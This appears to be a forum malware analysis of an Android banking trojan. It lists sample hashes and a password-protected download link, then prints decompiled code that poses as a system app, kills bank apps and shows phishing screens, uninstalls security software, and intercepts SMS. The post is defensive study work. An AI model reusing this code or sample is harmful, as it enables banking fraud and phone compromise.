一、 病毒样本基本信息
FileName: b5910a432d2b866e1028f31874edb32f.apk
File MD5: b5910a432d2b866e1028f31874edb32f
SHA1:0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1
File Size: 829006 Byte
Package:langthing.nend
Download:http://yunpan.cn/Q4qHuRLaNivtd 访问密码 3a90 解压密码:52pojie
// 该病毒首先伪装成系统程序防止卸载;然后试着去卸载安全软件;监测各种银行应用;对需要拦截短信的关键字进行了加密,增加了分析的难度;没有MAIN和LAUNCHER组件,安装后没有图标,防止用户察觉到安装了应用
二、 病毒代码分析
查看AndroidManifest.xml配置文件,可以发现赋予了病毒非常多的权限,且是高危的权限,例如发送短信、拨打电话、读取日志文件、重启应用程序等等,且没有MAIN和LAUNCHER组件
<manifest android:versionCode="1" android:versionName="1.1" package="langthing.nend"
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-permission android:name="android.permission.RECEIVE_SMS" /> //接收短信
<uses-permission android:name="android.permission.SEND_SMS" /> //发送短信
<uses-permission android:name="android.permission.READ_SMS" /> //读取短息
<uses-permission android:name="android.permission.WRITE_SMS" /> //编辑短信
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.READ_CONTACTS" /> //读取通讯录
<uses-permission android:name="android.permission.WRITE_SETTINGS" /> //读取系统设置的数据库权限
<uses-permission android:name="android.permission.READ_LOGS" /> //读取日志文件
<uses-permission android:name="android.permission.WRITE_CONTACTS" />//编辑通讯录联系人
<uses-permission android:name="android.permission.READ_PHONE_STATE" />//读取电话状态
<uses-permission android:name="android.permission.CALL_PHONE" /> //拨打电话
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//接收开机信息
<uses-permission android:name="android.permission.GET_TASKS" /> //获取运行程序信息
<uses-permission android:name="android.permission.RESTART_PACKAGES" />//重启应用程序
查看AndroidManifest.xml配置文件,可以发现注册了TReceiver、deviceAdminReceiver、Alarmreceiver等广播接收器,当手机触发对应的广播事件(如开机完成)时就会启动程序
<receiver android:name=".TReceiver">
<intent-filter android:priority="2147483647">
<action android:name="android.intent.action.BOOT_COMPLETED" />
</intent-filter>
</receiver>
<receiver android:label="@string/app_name" android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
<meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
<intent-filter>
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
</intent-filter>
</receiver>
<receiver android:name=".Alarmreceiver">
<intent-filter>
<action android:name="arui.alarm.action" />
</intent-filter>
</receiver>
<receiver android:name=".ShutdownReceiver">
<intent-filter>
<action android:name="android.intent.action.ACTION_SHUTDOWN" />
</intent-filter>
恶意注入代码的代码树如下:
当程序安装后,会伪装成系统程序,防止卸载。如图:
查看langthing.nend.main伪装成系统代码如下: [Java] 纯文本查看 复制代码 private void b()
{
// Asks the user to grant device-administrator rights to the component held in
// this.c (not visible here; the manifest above declares .deviceAdminReceiver
// with BIND_DEVICE_ADMIN, so presumably that is the component passed).
Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c);
// The explanation text shown on the system prompt is only "------ android ------",
// so no app name appears and the dialog looks like a system request.
// While the admin is active, a normal uninstall is refused; removal requires
// deactivating the administrator in the device-admin settings first.
localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------"); // poses as a system app
// Result code 1 is passed back to onActivityResult (handler not shown on this page).
startActivityForResult(localIntent, 1);
}
当应用监测到银行客户端启动时,就会终止该银行进程,并为工商银行、淘宝等定制了高仿真“钓鱼界面” private void e()
{
ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;
ActivityManager localActivityManager = (ActivityManager)getSystemService("activity");
String str = localComponentName.getClassName();
if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))
{
if (a(getApplicationContext(), "com.icbc"))
localActivityManager.restartPackage("com.icbc");
if (a(getApplicationContext(), "com.chinamworld.main"))
localActivityManager.restartPackage("com.chinamworld.main");
if (a(getApplicationContext(), "com.bankcomm"))
localActivityManager.restartPackage("com.bankcomm");
if (a(getApplicationContext(), "com.taobao.taobao"))
localActivityManager.restartPackage("com.taobao.taobao");
if (a(getApplicationContext(), "com.android.bankabc"))
localActivityManager.restartPackage("com.android.bankabc");
if (a(getApplicationContext(), "cmb.pb"))
localActivityManager.restartPackage("cmb.pb");
if (a(getApplicationContext(), "com.rytong.bankgdb"))
localActivityManager.restartPackage("com.rytong.bankgdb");
if (a(getApplicationContext(), "com.cib.bankcib"))
localActivityManager.restartPackage("com.cib.bankcib");
if (a(getApplicationContext(), "com.rytong.bankps"))
localActivityManager.restartPackage("com.rytong.bankps");
if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank"))
localActivityManager.restartPackage("cn.com.njcb.android.mobilebank");
if (a(getApplicationContext(), "com.ecitic.bank.mobile"))
localActivityManager.restartPackage("com.ecitic.bank.mobile");
if (a(getApplicationContext(), "com.cebbank.bankebb"))
localActivityManager.restartPackage("com.cebbank.bankebb");
if (a(getApplicationContext(), "cn.com.cmbc.mbank"))
localActivityManager.restartPackage("cn.com.cmbc.mbank");
if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per"))
localActivityManager.restartPackage("cn.com.spdb.mobilebank.per");
if (a(getApplicationContext(), "com.pingan.pabank.activity"))
localActivityManager.restartPackage("com.pingan.pabank.activity");
if (a(getApplicationContext(), "com.gzrcb.mobilebank"))
localActivityManager.restartPackage("com.gzrcb.mobilebank");
if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per"))
localActivityManager.restartPackage("cn.com.cqb.mobilebank.per");
if (a(getApplicationContext(), "com.chinamworld.bocmbci"))
localActivityManager.restartPackage("com.chinamworld.bocmbci");
if (a(getApplicationContext(), "com.rytong.app.bankhx"))
localActivityManager.restartPackage("com.rytong.app.bankhx");
if (a(getApplicationContext(), "com.csii.huzhou.mobilebank"))
localActivityManager.restartPackage("com.csii.huzhou.mobilebank");
if (a(getApplicationContext(), "cn.com.shbank.mper"))
localActivityManager.restartPackage("cn.com.shbank.mper");
if (a(getApplicationContext(), "com.rytong.bankqd"))
localActivityManager.restartPackage("com.rytong.bankqd");
if (a(getApplicationContext(), "com.tlbank"))
localActivityManager.restartPackage("com.tlbank");
if (a(getApplicationContext(), "com.sookin.scyh"))
localActivityManager.restartPackage("com.sookin.scyh");
if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per"))
localActivityManager.restartPackage("cn.com.hzb.mobilebank.per");
if (a(getApplicationContext(), "com.chinamworld.klb"))
localActivityManager.restartPackage("com.chinamworld.klb");
}
if (str.contains("icbc"))
{
Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);
if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))
{
localActivityManager.restartPackage("com.icbc");
new Intent("android.intent.action.MAIN");
Intent localIntent53 = new Intent("android.intent.action.MAIN");
localIntent53.setFlags(268435456);
localIntent53.addCategory("android.intent.category.HOME");
startActivity(localIntent53);
Intent localIntent54 = new Intent(getApplicationContext(), gs.class);
localIntent54.setFlags(268435456);
startActivity(localIntent54);
}
}
if (str.contains("com.chinamworld.main"))
{
Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null);
if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0))
{
localActivityManager.restartPackage("com.chinamworld.main");
new Intent("android.intent.action.MAIN");
Intent localIntent51 = new Intent("android.intent.action.MAIN");
localIntent51.setFlags(268435456);
localIntent51.addCategory("android.intent.category.HOME");
startActivity(localIntent51);
Intent localIntent52 = new Intent(getApplicationContext(), js.class);
localIntent52.setFlags(268435456);
startActivity(localIntent52);
}
}
if (str.contains("bankcomm"))
{
Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null);
if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0))
{
localActivityManager.restartPackage("com.bankcomm");
new Intent("android.intent.action.MAIN");
Intent localIntent49 = new Intent("android.intent.action.MAIN");
localIntent49.setFlags(268435456);
localIntent49.addCategory("android.intent.category.HOME");
startActivity(localIntent49);
Intent localIntent50 = new Intent(getApplicationContext(), jt.class);
localIntent50.setFlags(268435456);
startActivity(localIntent50);
}
}
if (str.contains("taobao"))
{
Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);
if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))
{
localActivityManager.restartPackage("com.taobao.taobao");
new Intent("android.intent.action.MAIN");
Intent localIntent47 = new Intent("android.intent.action.MAIN");
localIntent47.setFlags(268435456);
localIntent47.addCategory("android.intent.category.HOME");
startActivity(localIntent47);
Intent localIntent48 = new Intent(getApplicationContext(), tb.class);
localIntent48.setFlags(268435456);
startActivity(localIntent48);
}
// 终止各银行进程
查找安全软件并卸载安全软件 for (g = "Already root"; ; g = "NOroot")
{
this.C = 5;
this.E = 5;
this.B = new String[this.C];
this.D = new String[this.E];
this.B[0] = "pm uninstall com.qihoo360.mobilesafe"; //卸载360、腾讯、金山等相关的安全软件
this.B[1] = "pm uninstall com.tencent.qqpimsecure";
this.B[2] = "pm uninstall com.ijinshan.mguard";
this.B[3] = "pm uninstall com.ijinshan.duba";
this.B[4] = "pm uninstall com.anguanjia.safe";
this.D[0] = "com.qihoo360.mobilesafe";
this.D[1] = "com.tencent.qqpimsecure";
this.D[2] = "com.ijinshan.mguard";
this.D[3] = "com.ijinshan.duba";
this.D[4] = "com.anguanjia.safe";
this.s = new o();
拦截相关短信: if (i5 == 1)
if ((server.f == 0) && (server.a != i3))
{
server.a(this.a, 1);
server.b(this.a, i3);
str4 = "接收";
server.a(this.a, new o());
String str5 = server.d(this.a).a(this.a.getApplicationContext());
server.a(this.a, new n());
server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);
localStringBuilder.append("[ ");
localStringBuilder.append(str1 + ", ");
localStringBuilder.append(i4 + ", ");
localStringBuilder.append(str2 + ", ");
localStringBuilder.append(str3 + ", ");
localStringBuilder.append(str4);
localStringBuilder.append(" ]\n\n");
if (!localCursor1.isClosed())
localCursor1.close();
}
}
while (true)
{
localStringBuilder.append("getSmsInPhone has executed!");
super.onChange(paramBoolean);
return;
server.f = 0;
break;
if (i5 != 2)
break;
if (server.b == i3)
break label760;
Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC");
if (localCursor2.moveToFirst())
{
localCursor2.getColumnIndex("_id");
int i6 = localCursor2.getColumnIndex("sSend");
do
server.a(this.a, localCursor2.getString(i6));
while (localCursor2.moveToNext());
}
localCursor2.close();
if (server.h(this.a).equals("1"))
{
server.a(this.a, new o());
server.a(this.a, new n());
String str6 = server.d(this.a).a(this.a.getApplicationContext());
server.a(this.a, str2 + ";" + str1, str6);
}
server.b = i3;
str4 = "发送";
break;
localStringBuilder.append("no result!");
}
}
catch (SQLiteException localSQLiteException)
{
while (true)
{
continue;
label760: String str4 = "null";
}
}
}
}
解密密钥: [Java] 纯文本查看 复制代码 public void a()
{
// Copies the bundled asset "unhi.db" into this.q, which onCreate sets to the
// app's private files directory. onCreate then opens that path with helper
// class a (presumably an SQLiteOpenHelper, given c.a(...) returns a Cursor);
// the post's author identifies this file as the decryption key store.
// Detection note: the dropped file "<files dir>/unhi.db" and the identical
// asset inside the APK are stable on-device indicators for this sample.
try
{
InputStream localInputStream = getAssets().open("unhi.db"); // key material per the analysis above
FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db");
byte[] arrayOfByte = new byte[1024];
while (true)
{
int i1 = localInputStream.read(arrayOfByte);
// read() returns -1 at end of stream; the <= 0 test also treats a 0-byte read as EOF.
if (i1 <= 0)
{
localFileOutputStream.flush();
localFileOutputStream.close();
localInputStream.close();
return;
}
localFileOutputStream.write(arrayOfByte, 0, i1);
}
}
catch (Exception localException)
{
// Swallowed: on any I/O failure both streams stay open and the copy is left
// silently incomplete. a(String) only re-runs this when the file is absent,
// so a truncated unhi.db would persist across restarts.
}
}
public void a(String paramString)
{
// Drops unhi.db via a() only when nothing exists at paramString; onCreate
// passes this.q + "unhi.db". Existence is the sole check -- a partial or
// modified copy is never re-extracted.
if (!new File(paramString).exists())
a();
}
public void c()
{
// Starts a new instance of class l bound to this service; l is started with
// .start(), so presumably a Thread subclass. Its body is not shown on this page.
new l(this).start();
}
public IBinder onBind(Intent paramIntent)
{
// The service is not bindable; it is meant to be started, not bound, so
// returning null keeps clients from obtaining an IBinder to it.
return null;
}
public void onCreate()
{
this.u = new e();
IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
localIntentFilter.setPriority(2147483647);
registerReceiver(this.u, localIntentFilter);
p = (ActivityManager)getSystemService("activity");
this.F = 0;
this.j = false;
b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL);
this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/");
a(this.q + "unhi.db");
c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1);
m localm = new m(this, new Handler());
getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm);
Intent localIntent = new Intent(getApplicationContext(), log.class);
localIntent.setFlags(268435456);
startService(localIntent);
三、 总结 该病毒尝试着去卸载安全软件;采用了加密技术,增加了分析难度;并隐藏运行界面,防止用户察觉。可以看出移动安全问题越演越烈,且手段越来越高明,增加了分析难度。
// 由于本人对于密码学方面还没有Hello World的水平,所以无法解密相关信息,水平有限。